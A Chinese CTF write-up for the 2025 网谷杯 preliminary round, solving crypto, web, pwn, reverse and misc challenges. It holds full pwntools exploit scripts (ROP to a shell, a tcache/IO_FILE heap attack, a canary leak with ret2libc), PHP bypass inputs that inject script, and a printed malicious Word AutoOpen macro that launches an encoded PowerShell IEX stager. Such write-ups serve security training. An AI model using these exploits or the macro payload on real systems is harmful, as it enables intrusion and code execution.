3807 字
19 分钟
2025网谷杯初赛部分wp
前言
好想去线下,排名怎么还不出来
crypto
证书修复-wgb
给了三段密文,三个公私钥文件。先看第一个是完整的,直接恢复出来就行了
flag{You_do_have_a_good_unde
第二段,这里整个私钥扔到厨子里面转,然后手动分割
b15d020feef1b8f1e2b44799eaf63dba0906ae6051a96208dcc9089addc477849c81
024100b6f7fc666262d0002a6de03d2b9e5ce3eaa4c22fafa1b92fdc45160a0869cadb60227c7be0a06883044a140d565656de95cad277e774b56b179aadfcd8fa5c57
024100af62379afe7306388e8ab03b9df2e936833881e6d128140dd5d838e191342b9dd982b13cf3efac0a6b94bd2214df785eddc93460e1e306a890ee17ec3bf45ef1023f61ea5428767e6ad1abe3211d9b3a247bd41657d52d285ef23deebadca3a3f9eb6c870817431e94cf887c1c3f06f52d87f0a19a0090dce4396b685bb3f46a07
0241008a1bb5ddfff1643cb542d174a0f4e0616503e28778bd2ecd965026baba357303627d6044b7734cef07b8a1176d886ca987cd21ca091755eef7f20634a921ce81
024100b476cece31a9ec1fa751b36d1d7ed131d6ce1768b7dd63da3647356a8f5041fb2ca4e3a9af05a5451576779b3d6fff0ab63067f50756d44d87270243e5c19c3bq的值给了,直接求就行了。
rstanding_of_certificate_for
第三段也是类似的操作
e9eb5e816357b25e7a7c4a21c749b9e50e2a97ef44b873ebe1
024100a1a5b680d1d6c14dba3752a2beb7b9758526eb187957da4663283bff00062a774c5d9eaf7d7b52a17594dcc975507e9ad55db9aa061a9158c93be8f3c8b3b655
02410087462d8061c0f6251ca4e9b9dd7d5926d96081d5b52f7b76581365865278f0a13f7051d2ece1dda234c41946211a4839f72b2b5fb82bbfa286d82e868ce87341
024100a59a2709759dfa06baf631fde328ed900133da8b94513e7a69d9f5f3cdbd783071effe7ad7481169c0e7e852d599e842ef3166cd09621488b0bb2c6ca9d403a0分割出来是一直n、e、dp的板子,直接求就行
mats_and_the_RSA_algorithm.}
三重秘影-wgb(复现)
整个附件扔到厨子,可以求出一个二维码,扫一下得到...--cfadeb-----,还能分离出来一个图,里面是摩斯,解密得到9273016854。逆天的来了,这串数字中间恰好出现3紧挨着 0:9273[3]0[16854],这与二维码的3 … 0呼应。???
md,这你能想到的都是天才。
在 text.txt末尾可以找到 @开头的一段 base64,解开是64 个十六进制字符,题面只剩的提示语是:Stone Memory For…?谐音梗:SM Four ->SM4。所以我们采用SM4解密。???我有罪,没想到,key就是"9273" + "cfadeb" + "016854" = "9273cfadeb016854",搓个sm4的脚本就行了。
web
真假之间-wgb
php源码
if (isset($a) && strpos(base64_decode('MW82MmU3ZTYxZTQzZTk0YTE='), $a) && floatval($a) < 10000000 && floatval($a) > 6000000 && strlen($a) <= 4) {
$obj = (object)$b; if (isset($b) && strpos(strrchr(md5(sha1($obj->scalar)),'b1'),'fca7')) { echo "You're ok flag\n"; $c = urldecode($_GET['c'] ?? ''); if (preg_match('/setItem\s*\(\s*[\'"](.+?)[\'"]\s*,\s*(\[.*\])\s*\)/', $c, $matches)) { $m = $matches[1]; $n = $matches[2]; $value = json_decode($n, true); if (is_array($value) && is_numeric($value[1]) && !is_numeric($matches[1]) && $matches[1] > 2024) { if ($value[1] == "9999999999999999" && $value[1] !== "9999999999999999") { $i = $matches[1]; echo "<script>$c</script>"; echo "<script> var t = window.sessionStorage.getItem('".$i."'); const url = 'inc.php?flag1=1&value=' + encodeURIComponent(t); window.location.href = url; </script>";- a=7e6:既是目标字符串的子串,又能被 floatval 解析且满足范围及长度≤4。
- b=1108:使 md5(sha1(b)) 含有 b1 且在 b1 之后能找到 fca7(满足 strpos(strrchr(…,‘b1’),‘fca7’))。
- c=setItem(‘2025abc’,[0,9999999999999999]):满足正则、JSON 解码为数组、result[1][1] 是数值且在松散比较和严格比较间产生预期的真假(== 为真,!== 为真),并且 key ‘2025abc’ 同时满足 !is_numeric 与 >2024 的条件(PHP 的类型转换特性)。
curl过去拿到源码
<br/><script> (function() { var _0x1a2b = document.createElement("div"); _0x1a2b.innerHTML = "<h1>Success is the key to happiness</h1>"; document.body.appendChild(_0x1a2b) } )();</script><script id="spt"> !function() { var _0x3c7b = ["\x63\x6F\x6F\x6B\x69\x65"]; document[_0x3c7b[0]] = "Ao(mgHUKl=<&\AbEBu<QF]NB_COH" }();</script><script id='spt1'> !function() { var _0x29f0 = ['getElementById']; var _0x1f88 = function(_0x304e) { return _0x29f0[0]; }; var _0x1a1a = document[_0x1f88()]('spt'); _0x1a1a && _0x1a1a['parentNode']['removeChild'](_0x1a1a); var _0x3c71 = document[_0x1f88()]('spt1'); _0x3c71 && _0x3c71['parentNode']['removeChild'](_0x3c71); }();</script><script id="flag_base85"></script>base85出来
六件套-wgb
非预期,flag在/flag.php
叫什么名字来着这个web
这个题挺无语的,/flag.php有flag,但是提交不对,本来因为是出题人故意放假的,从头打了一遍,正常打也是拿到itc的文件,这里访问/itc/可以拿到一个1.txt,把文件尾放到文件头,变成rar,其实是openPGP public key,用爆破出来的code解压缩包,就是flag了,塞时没出来,光爆破压缩包了
pwn
zeroDay-wgb
Partial RELRO No canary found NX enabled No PIE No RPATH RW-RUNPATH No Symbols No 0 2 ./pwn
一道vm题,输入格式为opt + value,选项7为任意读,因为无pie,输入b'\x07' + p64(0x404018)得到libc,同时pop和push没有检查是否超过自定义栈顶,可通过一直pop然后push写rop链到vm处理函数的rbp附近
from pwn import *
io = process("pwn")context.arch = "amd64"context.log_level = "debug"
def leak(addr): io.send(b"\7" + p64(addr))
def push(val): return b"\1" + p64(val)
def pop(): return b"\2"
leak(0x404018) # putsio.recvuntil(b"LEAK: [0x404018] = ")base = int(io.recv(len("0x7f6a8da155c0")), 16) - 0x0000000000084420success(hex(base))system = base + 0x0000000000052290binsh = base + 0x1B45BDret = 0x40101Apayload = pop() * 131
io.send(payload)prdi = 0x0000000000401653payload = push(prdi) + push(binsh) + push(ret) + push(system)io.send(payload)io.interactive()io-wgb
Full RELRO Canary found NX enabled PIE enabled No RPATH RW-RUNPATH No Symbols No 0 1 io
堆题,漏洞点为可任意地址写固定大值
先构造large bin最大化泄露地址
因为是高版本,所以考虑覆写mp_.tcache_bins以此劫持tcache bin指针,然后就是正常打io
from pwn import *
io = process("./io")context.arch = "amd64"context.log_level = "debug"
def menu(): io.recvuntil(b"4.exit")
def alloc(size, content): menu() io.sendline(b"1") io.recvuntil(b"Content length:") io.sendline(str(size)) io.recvuntil(b"Please input your data:") io.send(content) io.recvuntil(b"Your data:\n")
def edit(content): menu() io.sendline(b"2") io.recvuntil(b"As if nothing can be done, but it seems useful?") io.send(content)
def free(idx): menu() io.sendline(b"3") io.recvuntil(b"Content id:") io.sendline(str(idx))
alloc(0x430, b"a")alloc(0x91, b"a")alloc(0x420, b"a")alloc(0x91, b"a")free(0)free(2)
alloc(0x420, b"\1")alloc(0x430, b"a" * 15 + b"z")io.recvuntil(b"z")heap = u64(io.recv(6).ljust(8, b"\0"))
free(2)sleep(1)alloc(0x430, b"\1")base = u64(io.recv(6).ljust(8, b"\0")) - 1 - 0x1ECB00 # - 0x211B00success("heap: " + hex(heap))success("base: " + hex(base))mp_tcache_bins = base + 0x00000000001EC2D0 # + 0x2111E8success(hex(mp_tcache_bins))
_IO_stdfile_2_lock = base + 0x00000000001EE7D0 # + 0x213700_IO_wfile_jumps = base + 0x00000000001E8F60 # + 0x2101E8system = base + 0x0000000000052290 # 0x5AF30chunk1_addr = heap + 0x13E0fp = IO_FILE_plus_struct()fp.flags = b" sh;"fp._IO_write_ptr = 0x1fp._lock = _IO_stdfile_2_lockfp.vtable = _IO_wfile_jumpsfp._wide_data = chunk1_addrfp = bytes(fp)payload = (b"\0".ljust(0x68, b"\0") + p64(system)).ljust(0xE0, b"\0") + p64(chunk1_addr)
free(1)free(0)alloc(0x500, b"a") # 0
alloc(0x500, b"a") # 1edit(p64(mp_tcache_bins))free(2)free(0) # 0x500
dest = base + 0x00000000001ED5A0 # + 0x2124C0 # IO_list_allalloc(0x430, b"a" * 2 * (8 * 6) + p64(0xDEADBEEF) + p64(dest))alloc(0x500, p(chunk1_addr + len(payload)))
alloc(0x500, payload + fp)
menu()io.sendline(b"4")io.interactive()Canary
Partial RELRO Canary found NX enabled No PIE No RPATH RW-RUNPATH 73 Symbols No 0 1 ./canary
普通canary题,没开PIE,调试发现使用选项2可以在任意地址生成canary并且如果重新跳转到main可实现无限循环,于是将canary生成到bss上,用main的write泄露,最后gift正常ret2libc
from pwn import *
io = process("./canary")context.arch = "amd64"context.log_level = "debug"
io.readline()io.sendline(b"2")payload = p64(0x404E80) + p64(0x000000000401296)io.send(payload)io.recvuntil(b"Do you want to enter other functions?\n")io.sendline(b"2")payload = p64(0x404E80 + 0x51 - 0x8) + p64(0x00000000004012DB)io.send(payload)canary = u64(io.recv(7).rjust(8, b"\0"))success(hex(canary))io.recv()io.sendline(b"1")prdi = 0x00000000004013E3puts_got = 0x0000000000404018ret = 0x000000000040101Aprbp = 0x00000000004011DDprsi_r15 = 0x00000000004013E1payload = p64(prdi) + p64(puts_got) + p64(0x4010A0) + p64(0x0000000000401256)payload = (b"/bin/sh\0").ljust(0x38, b"a") + p64(canary) + p64(0x404E80) + payloadio.send(payload)io.readline()base = u64(io.recv(6).ljust(8, b"\0")) - 0x0000000000084420 # - 0x875A0success(hex(base))system = base + 0x0000000000052290 #payload = p64(0) * 3 + p64(prdi) + p64(base + 0x00000000001B45BD) + p64(system)payload = (0x38 * b"a") + p64(canary) + p64(0x404E80) + payloadio.send(payload)
io.interactive()Reverse
比赛的时候没时间看re了,复现一下
c-wgb
好像也是非预期?ida看见flag{djqjnqdwgtj!}直接交,就对了。后面看了一下逻辑,就是xor后xor了,所以flag不变
NewRC4-wgb(复现)
比赛的时候没时间看,以为是VMP,就跑路了,结果是upx魔改,改回去就行了。
有个小坑
void __fastcall TlsCallback_0(__int64 a1, int a2){ __int64 v2; // rax unsigned __int64 v3; // rcx
if ( a2 == 1 ) { v2 = 16i64; if ( NtCurrentPeb()->BeingDebugged ) { v3 = 16i64; stru_140005080 = _mm_xor_ps((__m128)_mm_load_si128((const __m128i *)&xmmword_1400032A0), stru_140005080); qword_140005870 = (__int64)&stru_140005080; do stru_140005080.m128_i8[v3++] ^= 0x31u; while ( v3 < 0x14 ); } stru_140005080 = _mm_xor_ps((__m128)_mm_load_si128((const __m128i *)&xmmword_1400032B0), stru_140005080); do stru_140005080.m128_i8[v2++] ^= 0x7Au; while ( v2 < 20 ); }}这里对key进行处理了,丢给ai写脚本就行了,key和密文都很容易找到
满江红-wgb(复现)
在线提取一下word里面的内容,拿到源码
Attribute VB_Name = "ThisDocument"Attribute VB_Base = "1Normal.ThisDocument"Attribute VB_GlobalNameSpace = FalseAttribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TrueAttribute VB_TemplateDerived = TrueAttribute VB_Customizable = TruePrivate InitDone As BooleanPrivate Map1(0 To 63) As BytePrivate Map2(0 To 127) As ByteSub AutoOpen()CreateObject(unxor(Array(135, 46, 140, 24, 228, 225, 126, 169, 34, 40, 56), 3) & unxor(Array(201, 1), 14)).Run unxor(Array(137, 123, 117, 87, 89, 140, 200, 174, 138, 204, 135, 229, 75, 9, 168, 39, 117, 219, 2, 212, 118, 230, 128, 213, 197, 44, 99, 93, 193, 144, 49, 210, 70, 175, 228, 16, 187, 75, 36, 215, 144, 31, 223, 159, 127, 45, 9, 205, 183, 34), 16) & _unxor(Array(199, 228, 3, 153, 81, 192, 25, 128, 137, 147, 136, 23, 7, 80, 224, 108, 203, 255, 197, 21, 174, 66, 117, 184, 52, 127, 71, 19, 183, 239, 29, 155, 18, 223, 159, 241, 35, 183, 202, 179, 22, 101, 99, 100, 54, 218, 32, 33, 142, 198, 175, 159, 29, 205, 110, 154, 65, 22, 247, 152, 91, 192, 108, 145, 58, 203, 25, 158, 99, 37, 128, 229, 54, 60, 38, 178, 134, 208, 68, 38, 39, 99, 76, 155, 56, 147, 53, 156, 203), 66) & _unxor(Array(102, 198, 208, 164, 182, 203, 117, 231, 127, 219, 94, 126, 10, 162, 173, 72, 207, 156, 150, 219, 167, 117, 27, 172, 242, 233, 32, 72, 61, 65, 178, 142, 245, 133, 139, 29, 181, 134, 18, 199, 242, 233, 14, 5, 134, 127, 212, 91, 91, 8, 171, 90, 25, 109, 198, 97, 6, 157, 10, 45, 214, 27, 185, 134, 246, 145, 32, 196, 221, 131, 137, 27, 100, 146, 80, 67, 177, 161, 71, 193, 155, 175, 42, 192, 227, 172, 239, 123, 92), 155) & _unxor(Array(234, 141, 79, 179, 223, 15, 203, 43, 171, 112, 201, 234, 98, 141, 170, 14, 174, 104, 46, 107, 122, 18, 176, 138, 238, 208, 78, 126, 217, 208, 197, 2, 219, 144, 118, 145, 213, 45, 173, 225, 233, 161, 66, 174, 198, 108, 46, 184, 249, 150, 178, 36, 223, 5, 41, 60, 105, 114, 110, 110, 40, 134, 139, 35, 41, 235, 57, 182, 60, 105, 58, 175, 196, 240, 224, 144, 250, 156, 14, 138, 217, 9, 147, 115, 55, 194, 186, 162, 79), 244) & _unxor(Array(209, 193, 20, 114, 189, 230, 8, 167, 240, 61, 224, 242, 135, 166, 38, 7, 87, 151, 117, 148, 46, 97, 158, 117, 106, 143, 40, 126, 199, 26, 83, 196, 211, 16, 152, 203, 123, 22, 248, 60, 127, 38, 179, 12, 140, 170, 29, 148, 133, 77, 82, 213, 53, 92, 146, 151, 236, 151, 74, 37, 118, 16, 28, 157, 49, 18, 131, 195, 167, 133, 54, 214, 12, 248, 32, 108, 36, 131, 65, 250, 97, 12, 26, 10, 182, 16, 34, 15, 10), 333) & _unxor(Array(81, 75, 148, 28, 3, 254, 84, 127, 57, 78, 30, 146, 239, 82, 115, 175, 20, 208, 87, 218, 140, 50, 189, 210, 111, 35, 12, 128, 1, 116, 208, 150, 230, 88, 166, 120, 35, 106, 166, 121, 243, 216, 251, 46, 25, 196, 102, 54, 130, 52, 233, 123, 103, 240, 146, 114, 144, 49, 205, 121, 89, 126, 226, 239, 23, 51, 71, 7, 184, 111, 154, 71, 39, 28, 191, 99, 43, 237, 59, 241, 187, 84, 205, 162, 82, 62, 227, 183, 145), 422) & _unxor(Array(220, 194, 134, 110, 158, 136, 28, 157, 6, 28, 18, 29, 219, 15, 42, 69, 202, 26, 210, 214, 48, 60, 156, 210, 88, 81, 191, 153, 36, 72, 192, 205, 71, 101, 125, 96, 84, 172, 113, 120, 112, 252, 31, 16, 92, 180, 3, 4, 127, 58, 214, 173, 165, 31, 64, 250, 139, 176, 79, 89, 136, 249, 48, 37, 153, 201, 184, 51, 155, 186, 96, 121, 74, 163, 28, 131, 230, 74, 186, 237, 17, 163, 101, 17, 51, 1, 78, 40, 101), 511) & _unxor(Array(173, 96, 11, 202, 44, 219, 158, 69, 217, 56, 179, 84, 118, 152, 185, 163, 20, 92, 3, 211, 142, 226, 92, 27, 150, 191, 222, 95, 105, 58, 87, 200, 109, 108, 90, 41, 190, 252, 39, 215, 215, 150, 117, 140, 19, 0, 206, 174, 60, 83, 253, 136, 153, 112, 28, 55, 54, 1, 131, 65, 74, 92, 97, 135, 64, 80, 192, 181, 183, 54, 130, 9, 197, 65, 182, 38, 196, 1, 248, 217, 155, 50, 57, 1, 135, 114, 53, 68, 126), 600) & _unxor(Array(246, 123, 20, 204, 50, 152, 85, 111, 106, 210, 2, 247, 48, 159, 65, 255, 33, 131, 91, 157, 245, 204, 232, 223, 23, 163, 243, 109, 81, 181, 198, 99, 13, 150, 202, 151, 133, 228, 53, 192, 53, 212, 255, 30, 218, 222, 76, 176, 230, 46, 127, 0, 251, 133, 0, 75, 6, 98, 143, 221, 135, 70, 86, 153, 72, 105, 167, 91, 77, 86, 67, 240, 157, 143, 239, 49, 103, 247, 44, 158, 232, 23, 50, 225, 15, 179, 237, 94, 120), 689) & _unxor(Array(21, 83, 142, 200, 60, 47, 222, 133, 241, 121, 102, 78, 134, 204, 252, 118, 74, 8, 97, 95, 138, 94, 62, 159, 44, 75, 147, 70, 175, 185, 75, 205, 218, 38, 251, 211, 199, 207, 11, 12, 118, 242, 74, 62, 19, 187, 36, 239, 38, 120, 58, 21, 17, 110, 113, 192, 57, 6, 111, 168, 102, 244, 147, 53, 151, 47, 247, 65, 123, 74, 183, 87, 167, 131, 236, 21, 60, 168, 168, 109, 249, 113, 164, 208, 138, 110, 252, 219, 183), 778) & _unxor(Array(220, 77, 218, 41, 229, 2, 88, 252, 106, 253, 236, 187, 215, 59, 193, 15, 32, 150, 231, 159, 48, 149, 160, 224, 111, 182, 39, 147, 118, 135, 109, 38, 249, 118, 63, 205, 247, 94, 37, 175, 100, 222, 164, 108, 71, 245, 42, 113, 7, 181, 87, 188, 28, 71, 172, 75, 129, 136, 82, 8, 238, 65, 105, 125, 243, 190, 156, 168, 181, 28, 153, 190, 197, 25, 147, 84, 135, 79, 188, 11, 18, 30, 138, 195, 228, 177, 172, 230, 163), 867) & _unxor(Array(116, 194, 246, 44, 213, 63, 75, 126, 78, 201, 230, 241, 205, 28, 240, 125, 46, 241, 50, 61, 113, 118, 113, 86, 190, 61, 41, 156, 140, 82, 85, 106, 154, 150, 116, 59, 37, 253, 214, 245, 112, 156, 68, 246, 220, 182, 181, 189, 58, 225, 9, 164, 170, 238, 237, 86, 187, 55, 95, 125, 41, 240, 254, 175, 112, 213, 7, 13, 2, 246, 86, 176, 29, 97, 105, 229, 127, 121, 158, 77, 51, 32, 116, 104, 213, 158, 211, 231, 161), 956) & _unxor(Array(129, 43, 134, 12, 8, 25, 228, 210, 145, 230, 100, 15, 197, 93, 157, 207, 26, 89, 220, 180, 84, 164, 102, 26, 249, 193, 34, 39, 225, 173, 136, 48, 2, 189, 79, 149, 126, 91, 99, 100, 89, 230, 239, 55, 238, 118, 200, 215, 212, 103, 180, 29, 169, 169, 86, 253, 76, 43, 205, 184, 10, 200, 239, 162, 140, 127, 45, 214, 133, 132, 32, 46, 221, 66, 49, 28, 237, 233, 29, 55, 34, 233, 243, 91, 27, 182, 146, 58, 210), 1045) & _unxor(Array(221, 59, 115, 92, 39, 169, 26, 171, 5, 50, 197, 131, 119, 184, 107, 4, 29, 192, 53, 48, 132, 208, 65, 239, 155, 255, 215, 11, 24, 223, 136, 184, 64, 53, 126, 130, 187, 163, 164, 231, 37, 66, 251, 28, 11, 234, 2, 4, 164, 226, 66, 129, 205, 228, 64, 161, 54, 125, 62, 224, 56, 131, 134, 191, 223, 120, 130, 17, 7, 109, 154, 190, 7, 142, 154, 136, 163, 62, 125, 20, 97, 205, 30, 51, 252, 229, 116, 237, 29), 1134) & _unxor(Array(250, 244, 208, 17, 50, 212, 135, 122, 49, 134, 155, 37, 131, 204, 239, 166, 215, 221, 49, 134, 92, 63, 41, 197, 73, 176, 26, 30, 134, 119, 176, 123, 215, 56, 159, 8, 66, 175, 127, 67, 73, 174, 128, 162, 142, 209, 1, 136, 92, 160, 147, 191, 233, 99, 132, 42, 11, 107, 188, 42, 221, 194, 18, 107, 174, 79, 16, 20, 104, 155, 183, 188, 119, 207, 27, 251, 1, 131, 14, 91, 61, 115, 233, 57, 143, 178, 128, 246, 87), 1223) & _unxor(Array(214, 95, 231, 84, 214, 176, 235, 78, 206, 44, 143, 68, 150, 97, 49, 48, 56, 82, 156, 68, 43, 117, 63, 134, 143, 30, 38, 64, 222, 22), 1312)End SubPublic Function Base64Decode(ByVal s As String) As Byte() If Not InitDone Then Init Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s) Dim ILen As Long: ILen = UBound(IBuf) + 1 If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "" Do While ILen > 0 If IBuf(ILen - 1) <> Asc("=") Then Exit Do ILen = ILen - 1 Loop Dim OLen As Long: OLen = (ILen * 3) \ 4 Dim Out() As Byte ReDim Out(0 To OLen - 1) As Byte Dim ip As Long Dim op As Long Do While ip < ILen Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1 Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1 Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A") Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A") If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _ Err.Raise vbObjectError, , "" Dim b0 As Byte: b0 = Map2(i0) Dim b1 As Byte: b1 = Map2(i1) Dim b2 As Byte: b2 = Map2(i2) Dim b3 As Byte: b3 = Map2(i3) If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _ Err.Raise vbObjectError, , "" Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10) Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4) Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3 Out(op) = o0: op = op + 1 If op < OLen Then Out(op) = o1: op = op + 1 If op < OLen Then Out(op) = o2: op = op + 1 Loop Base64Decode = Out End FunctionPrivate Sub Init() Dim c As Integer, i As Integer i = 0 For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next Map1(i) = Asc("+"): i = i + 1 Map1(i) = Asc("/"): i = i + 1 For i = 0 To 127: Map2(i) = 255: Next For i = 0 To 63: Map2(Map1(i)) = i: Next InitDone = True End SubPrivate Function ConvertStringToBytes(ByVal s As String) As Byte() Dim b1() As Byte: b1 = s Dim l As Long: l = (UBound(b1) + 1) \ 2 If l = 0 Then ConvertStringToBytes = b1: Exit Function Dim b2() As Byte ReDim b2(0 To l - 1) As Byte Dim p As Long For p = 0 To l - 1 Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1)) If c >= 256 Then c = Asc("?") b2(p) = c Next ConvertStringToBytes = b2 End FunctionPrivate Function unxor(ciphertext As Variant, start As Integer) Dim cleartext As String Dim key() As Byte key = Base64Decode("rFd10H3vao2RCodxQF2lbfkUAjIr/6DL5qCnyC4p5EA0tEOXFafhhIdAIhum0XulB9+lU9wKRrDSWZ7XHGxFnPVUhqNK2DCnW8bI1MVWYxGhC4q5iFT5EzfCdTcWUu2+X9VTnKuwcOaIxVcmVyVjrWIRz4Dm3kecLNgAU8fZOKcu/XuMXN85ZMKjd3Rv882RBUFmICvacdJ36Yojk5HAwYoBpjjjHydt4NwJisnXgtA3K+2xqGEBfAPmz73uyn7CxCKGt7xPUdc+oRoeY+oObiyzIEPQS3mhWffHsNBhkbrBz1os3xEgxuM3gN6Xa5SE7Zo6G7vMFeKdYops3DGQuyDY60v7KXscOCLxwqeRFC+buIRH69E90JdP7KSC4CDZhxlv/cnX6HWdcWh7UTM7CWqzymtkqm/3fjp76pGxscG40k/M6UjaMnWg++oCkJZFMMenTvaxZ7GwyedlMxbOAtZ+INlBK+tPPIFbG42SRtmJH1e8Uz5p1E7h61vdxBkl" & _"l3sd196txhtnIlFZyHBc5IKXxHCbTa5hLl3CBpEgbn1I2FFhaEsYCtVyQrkdPmA5X6CuFhjuRacVoM131pMLVE7IQDG717EZ5BdiLOc4pb+5Q1iMAXfQQ6soJrjxM8ZgjzQYO5WuQkQFdfko6QZEa/0QaqhysOozj/sTeoj2wI2A0C/bwV35cV5EXJNOawqbWJCXdwzdsD8QjNhiDYGYFicJIRD5MBshvm1RGv1CZz54n+ziSgGe2vJ6GMy4cWv+i+hy0/shNgvhVcKuJfuPZuFUUHtqD3w07yZKj2ma+iKYCvIRO9nu8lYOQpbbowha1OyfGzx7BJkvJxth3b1xoJaiNMRwQZz/fiC8zvYxTlB0bsIHKR07xgI8gfCDd+NIhwL3YbdAor7ZfHhH3jNhBTykOlyrc/0yLQSTR8dx0BC9QMIerbSCqZ1Q4rUGEPiXIVvXjtrEhnSBTZW4U5uJHfGQbzlVuuRRCUAjyIzGCDHbDCjvEgwbNLLEzqdeJrh9" & _"3K1WddVO4bwcKlQb14luWJzBsDwrD8u7vi8LTRIe6A982G0Oygf6+Am9m2GIkp6eSWY3tSF/cOpmuWc+d1RCPzO5eEAm6TWT0ULWZ5QAMD31GObEpVRZ+eoCuDSckd0JvrP2lBSbZKRADL0unq3vhnmyTmflpvtH15ahJ+9mxgHGH2exGX6vgBx17iyx5T4WtBowQsIW310F1QrH6xNfvwM9PLv/3czSXs//jUDSB/AN60pVccuZtfPvp+ZMg6d9l0UKNiWIq7CMKbE7Z7BWWjNEMBPdfGbNzmQULvHXOXpnlZeyNd0ht57x9PljoFDD6N+sEuJ2DRprg7/qNZRJekOAF/VIID2SPgDfCkRhLg+Xq5KgysBO4U5nWKGD0IM1TYcc24pbCY31beUlebiKc2aS7MtxQ+o41wQaJQ8Ys5h13jeNgpUz5Vzc6BGWDUm6+X+Jqu/NK1qUy8Vmb5wXVl6BqFt6Y7yEGWv31QKTiVwyKWbuV+pRRYf3NvAqRX6n" & _"d1zFmAyuzoiVe1masPkUUjz2+uacpn8DuVpKrDJF64UDt4yhEeBsLHykecS+/r0pwEBGJdP/Vd/Y3OJ4MFUqnF9UvaYfrFG7trJQepnGH2DE4WTFna70hp9Fxx8LaJMI8lxfwBDxH5Z56kkF+j4hLuzq48vpQNId4tn+rFfFeHwp2GuZrVMkyQ1SVSDW9uUAjWu6ROhPEGwyjnjM2cG6MJQmphOD8bIfjGnOAscgU0d6FN0BHzRtx85xZwO1Vw==") cleartext = "" For i = LBound(ciphertext) To UBound(ciphertext) cleartext = cleartext & Chr(key(i + start) Xor ciphertext(i)) Next unxor = cleartextEnd Function这里有base64还有个自定义的xor,直接解密,可以得到一个ps命令
powershell -e LgAoACcAaQBlAFgAJwApACgAbgBFAHcALQBvAGIAagBFAGMAdAAgAFMAWQBzAHQAZQBNAC4ASQBvAC4AUwB0AFIAZQBBAE0AcgBlAGEAZABFAHIAKAAgACgAIABuAEUAdwAtAG8AYgBqAEUAYwB0ACAAIABTAHkAcwB0AEUATQAuAEkATwAuAEMATwBNAFAAUgBFAHMAcwBpAE8ATgAuAGQAZQBmAGwAYQBUAEUAUwB0AHIAZQBhAE0AKABbAEkAbwAuAE0AZQBtAG8AUgB5AHMAVABSAEUAQQBNAF0AIABbAHMAWQBzAFQAZQBNAC4AYwBPAG4AdgBFAHIAVABdADoAOgBmAFIATwBNAEIAQQBTAEUANgA0AFMAVAByAGkAbgBnACgAIAAnAGIAYwA2ADkAQwBzAEkAdwBHAEkAWABoAFAAVgBmAHgARwBSAHcAVQBMAEwAUwBrAGsAcwBsAEIAQgBYADkAQQBVAEIAdwBVAHAAOQBBAG0AbgA3AFEAUQBtADUAcQBrAFIAcABIAGUAdQB5ADAANgBPAHAAOABIAHoAbwB1AHkATQBFAEEAdgA2AEMAWQBRAEUATABSADUASQBKAHcAVwA4AHcARQBsAFoARgBoAFcAZABlAE4AaABCAGsAZgBNAFYATABRAHgAegBnAE0AOQBaAE0ANABGAFkAMQBVADMAbAAxAGMAWQAvAFUAaQBFAGQANgBDAHIAMwBYAHoAOQBEAG4ARQBRAHYARwBDAEMAMwBYAEsAbQBGAEYAUABpAGsAYQBjAGkAcQBVAFMASQByAFIASgBwAHcAKwBOAGIAeQBoAE8AWgBhAHYAMABTADcATQBsAGsAdwB6AHYAUwArAHoAbwBPAHoARQA0AEwAcAByAFcAWQBTAHAAdgBVAHYASwBWAGoAZQBCAE8AQQBzAHkAMAA5AFIAdgB2AEcAOQB6ADkAMABhAGEAeABGADYAYgB1ADYARgBsAEEANwAvAEUATwAyAGwAZgB5AGkAegBoAEQAeQBBAFEAPQA9ACcAKQAsACAAWwBzAFkAUwB0AEUATQAuAGkAbwAuAEMATwBNAFAAUgBlAFMAUwBpAG8ATgAuAGMATwBtAHAAcgBlAHMAUwBpAE8ATgBtAE8AZABFAF0AOgA6AEQAZQBDAG8AbQBQAHIARQBTAFMAKQAgACkALABbAHMAeQBzAFQARQBtAC4AVABFAFgAdAAuAGUAbgBjAE8AZABJAE4ARwBdADoAOgBBAHMAYwBpAEkAKQAgACkALgByAGUAYQBEAFQAbwBFAE4ARAAoACkA
ProcessHacker去读内存就行了,windows虚拟机立大功
算法组合(复现)
第一个是AES变种加密,第二段异或^ 0x42,第三段凯撒,第四段没怎么看明白,丢给ai他比我懂,真无奈了
misc
Format-8bit-wgb
文件尾部压缩包,foremost或者是手动010都能分离出来,解压出来文本是乱码,用这个在线解密网站,直接GB2312里面拿到flag了
non-interlaced-wgb
stegsolve里面看看,lsb隐写,而且是对应图片颜色的全部通道,比如第一个就是全部的red,九个图片全部提取出来合成一个压缩包,打开拿到flag
import os
def merge_to_zip(): files = [f for f in os.listdir('.') if f.isdigit() and 1 <= int(f) <= 9] files.sort(key=lambda x: int(x))
with open('output.zip', 'wb') as out: for fname in files: with open(fname, 'rb') as f: out.write(f.read()) print(f"已拼接: {fname}") print("生成文件:output.zip")
if __name__ == '__main__': merge_to_zip()